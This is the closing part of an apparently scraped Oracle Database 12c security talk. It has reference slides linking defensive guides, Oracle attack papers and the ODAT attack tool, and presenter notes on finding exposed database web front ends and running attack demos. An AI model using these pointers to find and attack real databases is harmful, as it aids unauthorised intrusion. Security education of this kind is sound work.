  • 48. References Oracle Database 12c security http://docs.oracle.com/database/121/nav/portal_25.htm Oracle database security checklist http://www.isaca.org/groups/professional-english/oracle- database/groupdocuments/twp-security-checklist-database-1-132870.pdf Encryption and Redaction in Oracle Database 12c with Oracle Advanced Security http://www.oracle.com/technetwork/database/options/advanced- security/advanced-security-wp-12c-1896139.pdf
  • 49. References Privelege escalation via Oracle indexes http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf Attacking Oracle with the Metasploit Framework http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates- OracleMetasploit-SLIDES.pdf Oracle Database TNS Listener Poison Attack http://www.joxeankoret.com/download/tnspoison.pdf
  • 50. References ODAT (Oracle Database Attacking Tool) tool https://github.com/quentinhardy/odat Oracle Database 12c CVE vulnerabilities statistics https://www.cvedetails.com/product/467/Oracle-Database- Server.html?vendor_id=93 Oracle Database 12c CVE vulnerabilities https://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id- 467/cvssscoremin-5/cvssscoremax-5.99/Oracle-Database-Server.html

Editor's Notes

  • #7: A motivating factor
  • #8: A motivating factor
  • #9: Using 11g make sure you do not share usernames or update to 12c.
  • #10: Make sure you use encrypted connection to the TNS listener even if the database us not available publicly. This could turn out to be an insider attack in case of no encryption. You can also update to 12c.
  • #11: Isqlplus is not shipped with Oracle database anymore … You can also search for other “mask” URL path instead of ‘isqlplus’ You can also search for other well known web apps for database quering (that also support latest DB version) You can search for well-known messages from search applications You can also perform directory index searches Show demo on the attack
  • #12: Show demo on the attack
  • #13: Isqlplus is not shipped with Oracle database anymore … You can also search for other “mask” URL path instead of ‘isqlplus’ You can also search for other well known web apps for database quering (that also support latest DB version) You can search for well-known messages from search applications You can also perform directory index searches Show demo on the attack
  • #14: David litchfield might have Bulgarian or Chinese roots as well … In the meantime the author is speaking mostly about insider attacks …
  • #15: David litchfield might have Bulgarian or Chinese roots as well … In the meantime the author is speaking mostly about insider attacks …
  • #16: David litchfield might have Bulgarian or Chinese roots as well … In the meantime the author is speaking mostly about insider attacks …
  • #17: David litchfield might have Bulgarian or Chinese roots as well … In the meantime the author is speaking mostly about insider attacks …
  • #18: David litchfield might have Bulgarian or Chinese roots as well … In the meantime the author is speaking mostly about insider attacks …
  • #19: David litchfield might have Bulgarian or Chinese roots as well … In the meantime the author is speaking mostly about insider attacks …
  • #21: More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  • #23: More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  • #24: More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  • #25: More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  • #26: More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  • #27: More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  • #28: More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  • #29: More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.